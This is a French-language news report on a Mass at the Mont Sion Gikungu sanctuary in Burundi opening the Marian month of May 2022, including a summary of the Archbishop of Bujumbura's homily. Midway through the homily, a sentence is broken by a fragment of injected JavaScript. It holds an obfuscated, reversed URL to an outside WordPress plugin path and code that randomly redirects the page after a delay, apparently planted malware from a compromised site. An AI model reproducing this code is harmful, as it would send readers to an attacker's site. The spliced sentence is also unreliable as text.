Selon l’organisation de la liturgie de l’Eglise, le mois de mai est dédié à la Vierge Marie, et le sanctuaire de la Reine de la paix et la réconciliation de Mont Sion Gikungu entend toujours bien s’accorder à cette organisation. Ce dimanche premier mai 2022 a été dédié à l’ouverture de ce mois, et toute la liturgie de ce jour a fait ressentir cet aspect. Le décor du chœur de l’église de la Sainte Trinité était en bleu et blanc, l’uniforme des chorales Sainte Maria Goretti et Pueri Cantores Maria Goretti était aussi en bleu et blanc. Des fidèles bien informés avaient un accoutrement en ces deux couleurs ci-haut mentionnées. La célébration eucharistique de ce dimanche a été présidée par Son Excellence l’Archevêque de Bujumbura, Monseigneur Gervais BANSHIMIYUBUSA, avec à ses côtés le Père Herménégilde COYITUNGIYE, Recteur du sanctuaire, et le Père Léonce NTAKIRUTIMANA qui est l’actuel Maître des Novices des Pères de Schoenstatt. Les lectures du jour étaient du livre des Actes des Apôtres (5, 27b-32. 40b-41), de l’Apocalypse de Jean (5, 11-14) et de l’Evangile selon Saint Jean (21, 1-19).
Le résonnement du tambour burundais a marqué le début des cérémonies du jour, suivi par un commentaire à l’église pour annoncer la valeur et la grandeur de la fête. Tout au début de la Messe, le Père Recteur du sanctuaire a, dans une brève allocution, souhaité la bienvenue à tout un chacun, à commencer bien entendu par Son Excellence Monseigneur l’Archevêque, à cette grandiose fête. ‘Nous nous réjouissons en ce jour où nous fêtons saint Joseph, patron des travailleurs, bien qu’au niveau national cette fête a été reportée pour ce lundi’. Nous sommes aussi dans l’année de saint Joseph que le Saint Siège a ouvert le 19 mars 2021 et qui sera clôturée le 26 de ce mois de mai qui commence aujourd’hui’, a précisé le Père Recteur. Nous voulons qu’avec la Vierge Marie, nous accomplissions la volonté de Dieu, et notre désir est que les cœurs et les mémoires des personnes soient guéris toujours grâce à la lumière de la Parole de Dieu. Par ces mots, le Père Recteur a invité Monseigneur l’Archevêque à présider les cérémonies du jour.
L’Archevêque a remercié la communauté des Pères de Schoenstatt pour lui avoir invité en ce jour et pour l’organisation de cette belle cérémonie. Il a aussi souhaité que toute personne retourne chez elle en ayant reçu les grâces et les bénédictions qui lui soient nécessaires pour toujours faire ce qui plaît devant la face de Dieu le Père.
Dans son homélie, l’Archevêque a rappelé que nous sommes rassemblés en cet endroit et en cette date du premier mai pour célébrer l’ouverture du mois marial. Nous voulons sans cesse être des enfants de Marie selon sa volonté, et nous voulons que nos âmes et celles de nos frères soient guéries. L’Église universelle toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}dont nous sommes membres commence chez nous en famille, alors que chacun est en train de la bâtir là où il/elle est. La Vierge Marie est celle qui est à côté de nous pour nous rappeler de faire sans cesse la volonté de Dieu dans les mots que nous connaissons très bien : ‘Tout ce qu’il vous dira, faites-le’. Et ce qui vaut le mieux c’est de faire la volonté de Dieu et non la nôtre.
Nous avons entendu que Pierre et ses frères avaient passé toute une nuit à pêcher sans rien prendre car ils n’étaient pas avec Jésus. Mais à partir du moment où ils ont croisé Jésus, ils ont attrapé beaucoup de poissons sans que leur filet soit détruit. Après cette rencontre, nous devons nous mettre à la suite de Jésus ressuscité et nous mettre à proclamer sa résurrection, bien que cela peut nous créer des ennuis et des ennemis. Pierre est allé pêcher du poisson comme cela était son métier avant sa rencontre avec Jésus, mais nous nous souvenons que Jésus lui avait désormais dit qu’il pêcherait des personnes. Voilà qu’il a tout oublié ou s’est passé de tout pour retourner dans ses affaires. Pêcher les hommes signifie les tirer du péché et de la mort pour les ramener à la vie en Dieu. La réaction de Pierre démontre notre faiblesse en tant qu’être humain à faire pleinement la volonté du Père. Cette faiblesse nous entraîne à nous passer de nos habits pour partir tout nu comme Pierre. Il s’est souvenu de s’habiller quand il a été informé qu’il était en présence de Jésus. Celui-ci en appelant ses disciples il a utilisé le mot ‘Enfants’. Il savait que c’était des adultes, mais il a voulu leur dire qu’ils ne devraient pas se comporter comme des enfants qui ne se soucient pas de leur mauvais état d’âme et de corps.
Cette habitude de na pas se soucier de son état d’âme est peut-être caractéristique du monde actuel et de nos sociétés présentes, à commencer par les chefs et dirigeants qui ont voulu empêcher aux disciples d’enseigner au Nom de Jésus Christ ressuscité. Ils ont suspecté que le mal qu’ils avaient fait à Jésus en le pendant sur la Croix allait leur retourner. Quand nous prêchons la Bonne Nouvelle de la résurrection de Jésus, nous devons le faire en toute liberté des enfants de Dieu et pas par peur du mal qui pourrait nous arriver après en provenance des autres personnes suite à notre enseignement. Que le Saint-Esprit nous remplisse et nous guide en tout comme il a été le cas pour la Vierge Marie avant qu’elle ne commence à accomplir la volonté de Dieu. Remplis de cet Esprit de Dieu, nous pourrons bâtir l’Eglise-Famille pour la guérison des mémoires. Amen
Nyandwi M.